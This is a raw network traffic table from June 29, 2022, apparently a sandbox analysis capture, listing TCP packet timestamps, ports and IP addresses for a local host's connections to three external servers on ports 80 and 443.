Jun 29, 2022 23:11:52.503454924 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.503464937 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.503468037 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.503477097 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.503515005 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.503520966 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.503557920 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.503590107 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.554960966 CEST	80	49766	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:52.558156967 CEST	49766	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:52.608021021 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.608041048 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.608112097 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.608125925 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.608164072 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.608172894 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.608206034 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.608234882 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.608262062 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.608292103 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.608361006 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.648585081 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.648631096 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.648756027 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.648772955 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.712079048 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.712109089 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.712212086 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.712235928 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.713033915 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.713043928 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.713074923 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.713084936 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.713097095 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.713119030 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.713161945 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.754966021 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.755021095 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.755037069 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.755053043 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.755139112 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.755163908 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.755194902 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.810355902 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.815570116 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.815582037 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.815597057 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.815629959 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.815654039 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.815658092 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.815668106 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.815728903 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.815917969 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.815928936 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.815978050 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.818260908 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.818279028 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.818382025 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.818439960 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.818450928 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.818485975 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.818507910 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.818522930 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.818537951 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.818552971 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.818552971 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.818564892 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.818587065 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.818587065 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.818598986 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.818620920 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.818620920 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.818650007 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.818659067 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.818674088 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.818737984 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.818772078 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.818835974 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.819087982 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.819111109 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.819159985 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.819174051 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.819212914 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.819242954 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.828252077 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.926373005 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.926402092 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.926445007 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.926490068 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.926548958 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.926556110 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.926589012 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.926609039 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.926615953 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.926637888 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.926666975 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.926682949 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.926723957 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.926733971 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.926745892 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.926794052 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.926804066 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.926817894 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.926845074 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.926877022 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.937444925 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.937489986 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:52.937505960 CEST	49768	443	192.168.2.3	206.221.182.74
Jun 29, 2022 23:11:52.937515974 CEST	443	49768	206.221.182.74	192.168.2.3
Jun 29, 2022 23:11:55.161098003 CEST	49769	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:55.395198107 CEST	80	49769	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:55.395344973 CEST	49769	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:55.395486116 CEST	49769	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:55.398355007 CEST	49769	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:55.927217960 CEST	80	49769	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:57.291734934 CEST	80	49769	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:57.291976929 CEST	49769	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:58.474776983 CEST	80	49769	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:58.478744030 CEST	49769	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:58.479469061 CEST	49769	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:58.513509035 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:11:58.825867891 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:11:58.826730967 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:11:58.840909004 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:11:58.841022968 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:11:59.153031111 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:11:59.340884924 CEST	80	49769	195.158.3.162	192.168.2.3
Jun 29, 2022 23:11:59.346827984 CEST	49769	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:59.513925076 CEST	49769	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:11:59.881319046 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:11:59.881354094 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:11:59.881437063 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:11:59.976838112 CEST	80	49769	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:00.192773104 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:00.192806959 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:00.192823887 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:00.192842007 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:00.192933083 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:00.192979097 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:00.504298925 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:00.504395962 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:00.504414082 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:00.504431009 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:00.504447937 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:00.504463911 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:00.504491091 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:00.504497051 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:00.504506111 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:00.504527092 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:00.504566908 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:00.815794945 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:00.815844059 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:00.815866947 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:00.815888882 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:00.815910101 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:00.815931082 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:00.815953970 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:00.815974951 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:00.815989017 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:00.815998077 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:00.816020966 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:00.816042900 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:00.816059113 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:00.816066027 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:00.816088915 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:00.816091061 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:00.816111088 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:00.816118956 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:00.816134930 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:00.816158056 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:00.920295000 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.029701948 CEST	80	49769	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:01.029788017 CEST	49769	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:01.127623081 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.127688885 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.127729893 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.127770901 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.127801895 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.127810001 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.127857924 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.127872944 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.127897024 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.127901077 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.127939939 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.127979040 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.128001928 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.128019094 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.128058910 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.128096104 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.128101110 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.128139973 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.128142118 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.128180981 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.128221035 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.128222942 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.128259897 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.128295898 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.128299952 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.128340960 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.128376007 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.128379107 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.128421068 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.128457069 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.128458023 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.128531933 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.128572941 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.128573895 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.128612995 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.128648996 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.128652096 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.231702089 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.231754065 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.231796026 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.310908079 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.440576077 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.440615892 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.440640926 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.440664053 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.440685034 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.440706015 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.440728903 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.440749884 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.440772057 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.440783978 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.440794945 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.440815926 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.440818071 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.440821886 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.440825939 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.440843105 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.440846920 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.440872908 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.440896034 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.440921068 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.440943003 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.440965891 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.440989971 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.441011906 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.441036940 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.441061020 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.441063881 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.441082954 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.441112995 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.441135883 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.441159964 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.441184998 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.441206932 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.441220045 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.441227913 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.441232920 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.441234112 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.441240072 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.441246033 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.441250086 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.441256046 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.441256046 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.441276073 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.441293001 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.441313028 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.441345930 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.441378117 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.752629995 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.752681017 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.752706051 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.752727985 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.752749920 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.752769947 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.752794027 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.752810001 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.752815962 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.752840042 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.752849102 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.752855062 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.752866030 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.752908945 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.752927065 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.752933025 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.752958059 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.752969980 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.752983093 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.753007889 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.753017902 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.753032923 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.753056049 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.753073931 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.753079891 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.753103971 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.753117085 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.753129005 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.753151894 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.753164053 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.753175020 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.753197908 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.753211021 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.753221035 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.753243923 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.753254890 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.753267050 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.753289938 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.753302097 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.753313065 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.753336906 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.753348112 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.753360987 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.753386021 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.753395081 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.753411055 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.753434896 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.753448009 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.753456116 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.753479004 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.753490925 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.753501892 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.753525972 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.753540993 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.753550053 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.753575087 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.753590107 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.753601074 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.753626108 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.753635883 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.753648043 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.753670931 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.753686905 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.753693104 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.753717899 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.753726006 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.753741026 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.753767014 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.753774881 CEST	49771	80	192.168.2.3	211.53.230.67
Jun 29, 2022 23:12:01.753793001 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.753818035 CEST	80	49771	211.53.230.67	192.168.2.3
Jun 29, 2022 23:12:01.753829002 CEST	49771	80	192.168.2.3	211.53.230.67
